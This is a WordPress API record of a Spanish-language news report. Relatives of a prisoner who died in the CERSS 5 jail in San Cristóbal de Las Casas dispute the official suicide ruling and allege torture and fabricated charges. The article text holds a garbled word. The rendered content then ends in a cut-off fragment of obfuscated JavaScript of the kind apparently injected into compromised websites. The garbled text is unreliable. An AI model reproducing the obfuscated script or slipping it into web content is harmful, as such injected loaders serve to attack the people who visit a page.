{"id":5774,"date":"2022-10-11T03:26:28","date_gmt":"2022-10-11T03:26:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5774"},"modified":"2022-10-11T03:26:29","modified_gmt":"2022-10-11T03:26:29","slug":"piden-justicia-por-la-muerte-de-interno-en-el-cerss-5","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5774","title":{"rendered":"Piden justicia por la muerte de Interno en el CERSS 5"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-10-at-1.54.08-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-5775\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-10-at-1.54.08-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-10-at-1.54.08-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-10-at-1.54.08-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-10-at-1.54.08-PM.jpeg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Familiares de quien en vida respondiera al nombre de Adolfo G\u00f3mez G\u00f3mez, quien fue hallado muerto en su celda, el 27 de julio del 2020, demandaron se esclarezca el hecho, ya que no le creen a las instancias de gobierno, se haya quitado la vida como les han dicho.<\/p>\n\n\n\n<p>Apoyados de la Asociaci\u00f3n Civil, Melel Xojobal, en conferencia de prensa, piden justicia, ya que fue relacionado con el secuestro del ni\u00f1o Dylan, el cual se supo fue una equivocaci\u00f3n, y por una erros, fue encarcela*f*fff*fer~e~do y falleci\u00f3 en el CERSS 5 de San Crist\u00f3bal.<\/p>\n\n\n\n<p>Enereida G\u00f3mez S\u00e1nchez, pidi\u00f3 a las autoridades hagan justicia pues su familia ha sufrido varias violaciones a sus derechos humanos y es que su padre fue extorsionado y torturado en la c\u00e1rcel, para que confesara sobre el secuestro del ni\u00f1o Dylan y en las investigaciones existe una serie de irregularidades como la desaparici\u00f3n de algunos datos de prueba.<\/p>\n\n\n\n<p>\u201cMi padre fue acusado de un falso delito contra la salud y luego le fabricaron el delito de desaparici\u00f3n forzada del ni\u00f1o Dylan, por lo que sufri\u00f3 agresiones f\u00edsicas y psicol\u00f3gicas, adem\u00e1s de detener de forma ilegal tambi\u00e9n a mi madre y varios integrantes de su familia, para interrogarlos con m\u00e9todos de tortura y construirles el delito\u201d, dijo.<\/p>\n\n\n\n<p>Asimismo, asegur\u00f3 que su padre fue asesinado, ya que no consiguieron la cantidad de 50 mil pesos y a pesar de aportar pruebas de este crimen, las autoridades han cometido irregularidades y a dos a\u00f1os de este acontecimiento exigen el derecho a la verdad, \u201cpedimos justicia, sufrimos acusaciones falsas y todav\u00eda eso tiene consecuencias, adem\u00e1s de la muerte de mi padre, tenemos dos a\u00f1os sufriendo y pidiendo justicia\u201d.<\/p>\n\n\n\n<p>\u201cEst\u00e1n intentando que creamos que mi padre se suicid\u00f3 y eso no es cierto, estamos desde el 2020 pidiendo justicia, pero extraviaron pruebas y no dan con el responsable de la muerte de mi padre, ellos quieren esconder todo, es por eso que exigimos justicia, que se sepa la verdad\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Familiares de quien en vida respondiera al nombre de Adolfo G\u00f3mez G\u00f3mez, quien fue hallado muerto en su celda, el 27 de julio del 2020, demandaron se esclarezca el hecho, ya que no le creen a las instancias de gobierno, se haya quitado la vida como les han &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5775,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5774","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5774","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5774"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5774\/revisions"}],"predecessor-version":[{"id":5776,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5774\/revisions\/5776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5775"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5774"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5774"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5774"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}